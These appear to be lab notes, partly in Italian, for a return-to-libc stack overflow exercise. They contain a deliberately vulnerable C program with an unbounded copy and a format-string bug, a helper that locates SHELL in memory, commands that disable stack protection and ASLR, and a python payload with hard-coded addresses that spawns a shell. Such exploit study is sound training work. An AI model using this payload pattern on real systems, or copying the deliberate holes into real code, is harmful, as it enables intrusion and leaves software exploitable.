uscendo dalla shell si va in segmentation fault perché come ret c'è AAAA
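# Build the 32-bit helper and the deliberately weak target: no stack canary,
# executable stack (see vuln.c below).
gcc -m32 -o getenv ./getenv.c
gcc -m32 -fno-stack-protector -z execstack -o vuln ./vuln.c
# Disable ASLR for this lab session (not persistent across reboots).
# The redirection has to be done by the privileged process: with
# `sudo echo 0 > /proc/...` the unprivileged shell opens the file itself
# and fails with "Permission denied".
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space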
vuln.c
#include <stdio.h>
#include <string.h>
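int main(int argc, char *argv[])
{
    /* Deliberately weak target for the exercise above (built with
     * -fno-stack-protector -z execstack): argv[1] is copied into a fixed
     * 256-byte buffer with no length check, so a longer argument runs past
     * the buffer, and the buffer is then handed to printf() as the format
     * string. A hardened version would use a bounded, terminated copy
     * (e.g. snprintf(buf, sizeof buf, "%s", argv[1])) and printf("%s", buf).
     * Both defects are kept on purpose; only the missing argument check and
     * the missing return value are fixed here. */
    char buf[256];
    if (argc < 2) {
        /* strlen(NULL) would crash before the exercise even starts. */
        return 1;
    }
    memcpy(buf, argv[1], strlen(argv[1])); /* unbounded copy; also leaves buf without a NUL terminator */
    printf(buf);                           /* attacker-controlled format string */
    return 0;
}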
getenv.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
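int main(int argc, char *argv[]) {
    char *ptr;
    if (argc < 3) {
        printf("Usage: %s <environment var> <target program name>\n", argv[0]);
        exit(1); /* usage error: report failure (the original exited with 0) */
    }
    ptr = getenv(argv[1]); /* Get env var location. */
    if (ptr == NULL) {
        /* Without this check the arithmetic below is applied to NULL and a
         * meaningless address is printed. */
        fprintf(stderr, "%s is not set in this environment\n", argv[1]);
        exit(1);
    }
    /* Adjust for program name: the variable's position in the target's
     * initial stack shifts by the difference between the two program-name
     * lengths. The factor 2 presumably reflects the name being stored twice
     * in the initial stack layout -- confirm for this loader. The difference
     * is computed as a signed value: strlen() returns size_t, so a target
     * name longer than argv[0] would otherwise wrap around. */
    ptr += ((long)strlen(argv[0]) - (long)strlen(argv[2])) * 2;
    printf("%s will be at %p\n", argv[1], ptr);
    return 0;
}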
# Put SHELL into the environment that child processes (./vuln, ./getv) inherit.
SHELL='/bin/sh'
export SHELL
------------------- GDB --------------------------
gdb ./vuln
# Break at main and start the process so its initial stack (arguments and
# environment) is mapped.
b main
r
# Examine 500 NUL-terminated strings starting at the stack pointer; the
# environment block, including SHELL, is among them.
x/500s $esp
(per trovare l'indirizzo della SHELL)
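# Rename the helper so its argv[0] has the same length as the target's ("vuln",
# 4 characters): getenv.c corrects for the name-length difference. The note
# that followed the command on this line was not a shell comment and would
# have made the line fail to parse.
mv getenv getv
# Argument built with python2 (print statement). The embedded addresses were
# taken from the gdb session above and are only meaningful with ASLR disabled.
./vuln $(python -c 'print "A"*268+"\x30\x6c\xe9\xf7"+"AAAA"+"\x3f\xd7\xff\xff"')
# Reports where SHELL sits in ./vuln's environment (see getenv.c above). The
# notes list it after the run, but it appears to be needed before it.
./getv SHELL ./vuln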
documento pdf